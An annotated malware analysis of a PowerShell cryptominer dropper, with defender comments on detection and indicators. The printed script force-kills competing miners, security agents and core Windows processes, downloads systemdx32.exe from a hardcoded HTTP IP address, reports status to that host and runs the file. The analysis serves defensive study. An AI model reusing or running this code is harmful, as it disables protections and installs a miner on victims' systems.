# Analyst note: this is PowerShell, not POSIX shell. These four statements only
# collect data and define two process-name lists; the termination logic is in
# the foreach loop that follows them.
# Samples the "% Processor Time" counter for every process instance on the host.
- $counters = (Get-Counter '\Process(*)\% Processor Time').CounterSamples
# First list: names the loop terminates only when the instance reads 50 or more
# on that counter. Despite the variable name, it mixes miner names (xmrig,
# cpuminer, minergate) with core Windows processes (lsass, csrss, svchost,
# winlogon, explorer), names used by endpoint-security products (msmpeng, ekrn,
# mcshield, ntrtscan, 360tray) and server software (mysqld, sqlservr, w3wp,
# httpd, tomcat7). A match against this list therefore says nothing about
# whether the matched process is malicious.
# NOTE(review): the entry "tomcat6" is split across a line break in this paste;
# that looks like an extraction artifact -- confirm against the raw sample.
- $malwares = "alm","vag_pag","office","pws_lotinfo_trans","aspnet_state","tasksvr","ekrn","iems","secscan","mysql","trustedinstaller","safedogsiteiis","write","360cleanhelper","sw_magik_gss","wd160session","smsservice","360rps","win1nit","npinst","xmrig","mrservicehost","360rp","hrate","xmr","laozi","csrs","postgres","csrv","safedogguardcenter","sl_gps_msg","javaservice","lsass","taskngr","dc","aipcopywlh64","xqjxke","sl_gps_rule","svhosts","qqexternal","streamserver","qv","sapstartsrv","avgcsrva","360se","alarmservice","nscpucnminer64","thunderplatform","xmrig32","ntrtscan","arp","a8service","msiexev","rsturboball","sl_join_bb808","ramdial","sl_upload809_1","beasvcx64","ptzproxyservice","connect","runtimebroker","system64","win1ogin","sql31","vmware","systemiissec","werfault","w3wp","snmpd","conhosts","taskhots","icrawlers_fbs_cjd","systmss","calcserviced","wmiprvser","bcompare","helppanc","memcached","qqpctray","see64","sl_join_srv","svchsot","reportengine","lms","winlogo","360tray","sppscv","nmsclient","mysqld","stest","apache","waterfox","teamviewer","mssql","mscorswv","jp2launcher","service","launch","tktbqi","mssys","taskhost","coiacy","networkmanager","systemtask","runtime","msmpeng","7za","reportingservicesservice","firefox","zhudongfangyu","wudfhost","javaw","mscl","lsmosee","cs","secury","db2syscs","xmr86","httpd","esetonlinescanner_enu","java","magserver","ravmond","chrome","serviceshost","update_windows","chinelada","system","carboniteservice","perl","ctsrvr","voipswitch","qqprotect","taskmgr","scope","vrmserver","wmiprvse","centralclient","csres","mcshield","mgmt","seccopy","wininits","decodeprocess","dvsvct","csrss","dvsvcs","update64","regsvr32","sl_gps_gpsserver","servicewatchdog","mininews","dllhost","msiexec","ntvdm","ivms","oneclickservice","cidaemon","spoolvs","cloudhelper","desktoplayer","conhost","messageserver","vshell","vag_stream","logon","powershell","svchosts3","servisce","vtdu","stream","process","svchost","qqpcnetflow","tomcat7","tomcat
6","spoolsv","spectroserver","sceserver","filesearcherindex","tomcat8","sqlservr","mapa","nlbrute","360sdupd","winlogon","ccsvchst","csc","safedogtray","appserver","hpbsm_wde","ksmsvc","tkinstaller","calcclientgyd","smss","ns","mscorsvw","xmrig1","winlogin","qqpcrealtimespeedup","explorer","mscorswu","convert_imagemagick","win1ogins","qqpcrtp","nmsserver","oracle","winlnlts","svchostx","cms_controlclient","services","inteldevicemanager","iexplore","lsmose","frmweb","pag","dcserver","ggtbviewer","winlogan","cpuminer","minergate","cascade","wmiapsrv","nvidia","softupnotify","sl_gps_adapter"
# Second list: names the loop terminates regardless of CPU reading. It holds
# miner names (xmrig, cpuminer, nscpucnminer64) and look-alikes of Windows
# process names (svhosts, win1ogin, winlogan, taskngr), plus "taskhost", which
# is also a legitimate Windows process name. "nscpucnminer64" is listed twice.
# NOTE(review): presumably a list of competing miners to evict -- inferred from
# the names, not established by the code.
- $malwares2 = "Silence","Carbon","xmrig32","nscpucnminer64","mrservicehost","servisce","svchosts3","svhosts","system64","systemiissec","taskhost","vrmserver","vshell","winlogan","winlogo","logon","win1nit","wininits","winlnlts","taskngr","tasksvr","mscl","cpuminer","sql31","taskhots","svchostx","xmr86","xmrig","xmr","win1ogin","win1ogins","ccsvchst","nscpucnminer64","update_windows"
# Walks every counter sample and force-terminates processes by name.
# Defender view: a burst of Stop-Process calls against security agents, database
# servers or core Windows processes from a single PowerShell session is a strong
# behavioural signal. With script block logging enabled, this body is recorded
# in event 4104.
- foreach ($counter in $counters) {
# Threshold branch: only instances reading 50 or more on "% Processor Time".
- if ($counter.CookedValue -ge 50) {
# "idle" and "_total" are pseudo-instances of the Process counter set, not real
# processes; "continue" moves on to the next sample, so the unconditional check
# further down is skipped for them as well.
- if ($counter.InstanceName -eq "idle" -Or $counter.InstanceName -eq "_total") {
- continue
- }
# -eq on strings is case-insensitive in PowerShell, so name casing does not matter.
- foreach ($malware in $malwares) {
- if ($counter.InstanceName -eq $malware) {
# -processname selects by name, so every process carrying that name is stopped,
# not just the sampled instance; -Force suppresses the confirmation prompt.
- Stop-Process -processname $counter.InstanceName -Force
- }
- }
- }
# This second pass sits outside the CPU-threshold branch: a name match alone is
# enough for the process to be terminated.
- foreach ($malware2 in $malwares2) {
- if ($counter.InstanceName -eq $malware2) {
- Stop-Process -processname $counter.InstanceName -Force
- }
- }
- }
# Configuration and payload download. Indicators visible in this section:
#   * a plain-HTTP base URL held in $HSST (bare IP address, no hostname, no TLS)
#   * remote paths /files/w/default and /files/w/others under that base
#   * the dropped file name systemdx32.exe
# $SELF_COPY is assigned but not referenced anywhere in the lines shown.
- $SELF_COPY = "$HOME\readme.txt"
- $HSST = "http://191.101.180.84"
# The callback endpoint is the same host that serves the payload.
- $CALLBACK = $HSST
- $DEFAULT_RFILE = "$HSST/files/w/default"
- $OTHERS_RFILE = "$HSST/files/w/others"
- $LFILE_NAME = "systemdx32.exe"
# The two commented-out assignments are alternative drop locations (the TMP
# directory and the user profile) that are disabled in this copy.
- # $LFILE_PATH = "$env:TMP\$LFILE_NAME"
- # $LFILE_PATH = "$HOME\$LFILE_NAME"
# The active value is a bare relative file name, so where the file lands depends
# on the working directory of the PowerShell process. Hunt by file name rather
# than by a fixed path.
- $LFILE_PATH = "$LFILE_NAME"
- $DOWNLOADER = New-Object System.Net.WebClient
# IntPtr size is 8 in a 64-bit process and 4 in a 32-bit one. This reflects the
# bitness of the running PowerShell host, not necessarily that of the OS.
- $SYSTEM_BIT = [System.IntPtr]::Size
- if ( $SYSTEM_BIT -eq 8 ) {
# 64-bit host: fetches the "default" remote file.
- $DOWNLOADER.DownloadFile($DEFAULT_RFILE, $LFILE_PATH)
- } else {
# Any other pointer size: fetches the "others" remote file.
- $DOWNLOADER.DownloadFile($OTHERS_RFILE, $LFILE_PATH)
- }
# The download runs on every execution of the script, with no preceding check
# in this section. Each run therefore produces an outbound HTTP GET and a file
# write that network and endpoint telemetry can key on.
# Launch-or-report step. If no process named systemdx32 exists, the script
# requests "$CALLBACK/?info=w0" and then starts the dropped file through cmd.exe;
# otherwise it requests "$CALLBACK/?info=w9". The response body is not assigned
# to a variable in either branch.
# NOTE(review): w0 / w9 look like status values reported to the server (freshly
# started vs. already running) -- inferred from the branch structure only.
# Detection: powershell.exe spawning cmd.exe with "/c systemdx32.exe" on its
# command line, and HTTP GETs whose query string is exactly info=w0 or info=w9.
# -ErrorAction SilentlyContinue hides the "process not found" error, so the
# condition simply tests whether Get-Process returned anything.
- if ( !(Get-Process systemdx32 -ErrorAction SilentlyContinue) ) {
- $DOWNLOADER.DownloadString("$CALLBACK/?info=w0")
- cmd.exe /c $LFILE_PATH
- } else {
- $DOWNLOADER.DownloadString("$CALLBACK/?info=w9")
- }